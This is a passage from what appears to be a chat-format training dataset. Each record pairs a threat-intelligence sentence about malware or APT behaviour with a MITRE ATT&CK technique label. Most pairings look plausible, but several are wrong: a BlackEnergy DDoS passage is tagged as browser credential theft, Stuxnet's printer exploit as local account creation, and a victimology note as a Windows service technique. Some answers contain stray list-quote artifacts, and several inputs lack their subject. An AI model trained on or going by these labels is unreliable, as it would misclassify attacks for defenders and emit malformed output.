- "content": "Magic Hound has compromised email credentials in order to steal sensitive data."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Felismus has masqueraded as legitimate Adobe Content Management System files."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT has a command to edit the Registry on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of available servers with the command \"net view\"."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used DLL side-loading to load malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for interesting files (either a default or customized set of file extensions) on the local system and removable media."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SPLM, otherwise known as CHOPSTICK, or by the author(s) as “XAgent”, is described as Sofacy’s signature second stage tool, selectively used for years against around the world. Really, many modified XAgent modules have been deployed over the years. Even the individual Linux modules renamed as “Fysbis” backdoors released in 2016 were merely modified and reduced portions of recompiled XAgent C/C++ codebase. Anyway, SPLM/CHOPSTICK has maintained various combinations of code, with some recognizable functionality listed here."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has created scheduled tasks to maintain Machete's persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avenger can extract backdoor malware from downloaded images."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet extracts and writes driver files that match the times of other legitimate files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a global service provider's IP as a proxy for C2 traffic from a victim."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "37 38 zlib64.dll zlib32.dll Open source “zlib” version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll)"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\\Socks5."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can generate shellcode outputs that execute via Ruby."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "prompts the user for their credentials."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HiddenWasp adds itself to the LD_PRELOAD path and sets a series of environment variables."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has a tool that can detect the existence of remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEARDROP checked that \"HKU\\SOFTWARE\\Microsoft\\CTF\" existed before decoding its embedded payload."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system’s defenses."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1562 - Impair Defenses', 'T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks for the presence of Bitdefender security software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can collect directory and file lists."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT used TLS to encrypt communications over port 143"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. sar_addr@protonmail[.]com WeAreHere@secmail[.]pro nosterrmann@mail[.]com nosterrmann@protonmail[.]com"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has developed custom malware that allowed them to maintain persistence on victim networks."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities."
- },
- {
- "role": "assistant",
- "content": "T1593.001 - Social Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The printer vulnerability MS10-061 exploited by Stuxnet – using a special MOF file, executed on the attacked system using WMI"
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, GoldMax retrieves a list of the system’s network interfaces; the malware terminates if it is unable to do so or no network interface is configured. It then attempts to determine if any of the network interfaces has the following hardcoded MAC address: c8:27:cc:c2:37:5a"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:"
- },
- {
- "role": "assistant",
- "content": "T1574.011 - Hijack Execution Flow: Services Registry Permissions Weakness"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called “Sandworm Team” also"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a package that collects documents from any inserted USB sticks."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used rundll32 to execute malicious payloads on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The majority of documents used the name “gerry knight” for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has hidden payloads in Flash directories and fake installer files."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The victims Data from Cadelle’s C&C servers shows that a large number of Backdoor.Cadelspy infections affected individual users of Iranian internet service providers (ISPs) and hosting services"
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After applying this decryption algorithm, we are presented with the following data: h=HOSTNAME-PC&f=mission.ini&c=& The response made by the C2 server uses the same RC4 key for encryption"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla surveys a system upon check-in to discover information in the Windows Registry with the \"reg query\" command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes ."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM has changed the creation date of files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1064 - Scripting', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands."
- },
- {
- "role": "assistant",
- "content": "T1564.010 - Process Argument Spoofing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After this registry change, ShowCompColor and ShowInfoTip keys are also modified to disable the display of compressed and encrypted NTFS files in color. This setting allows you to see compressed files in a blue color"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT accepts many possible commands that the C2 server can provide. These commands are sent as a response to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands and sub-commands have been identified"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With the file written to the system, the Trojan calls the \"GetishideAbById\" SOAP action to determine whether or not the C2 server wishes to execute the newly dropped file in a hidden window. This request is followed by a call to \"GetisrunasAbById\" to determine if the Trojan should use \"runas\" to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An downloader establishes SOCKS5 connections for its initial C2."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy', 'T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can wait 30 minutes before initiating contact with C2."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has leveraged iplogger.org to send collected data back to C2."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has used several different keyloggers."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used net.exe in a script with \"net accounts /domain\" to find the password policy of a domain."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to enumerate drive types."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon is known to use software packing in its tools."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper can delete itself from the victim. Another variant has the capability to delete specified files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mouse position: Darkhotel repeatedly checks for the position of the mouse cursor on the screen. If the cursor remains at the center of the desktop, it is unlikely that a real user is using the system. Because of this, most sandboxes periodically move the mouse cursor or perform some other type of interaction with the desktop"
- },
- {
- "role": "assistant",
- "content": "T1497.002 - User Activity Based Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware uses the AMAP SDK to get accurate location of infected devices by GPS, mobile network (such as base stations), WiFi and other information. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. All C2 communications are encrypted with the AES algorithm using a key generated by computing five MD5 hashes starting with the key \"1qazxcvbnm\", and adding a salt value of “.)1/” in each iteration"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the ‘at' or ‘schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1053.002 - Scheduled Task/Job: At', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers modified the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file."
- },
- {
- "role": "assistant",
- "content": "T1553 - Subvert Trust Controls"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using \"/usr/bin/sw_vers -productVersion\"."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts C2 traffic with AES and RSA."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN can download and upload files to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can use msiexec.exe to disable security tools on the system."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack executes the \"cmd.exe\" command."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex can stop and disable services on the system."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHUTTERSPEED can capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
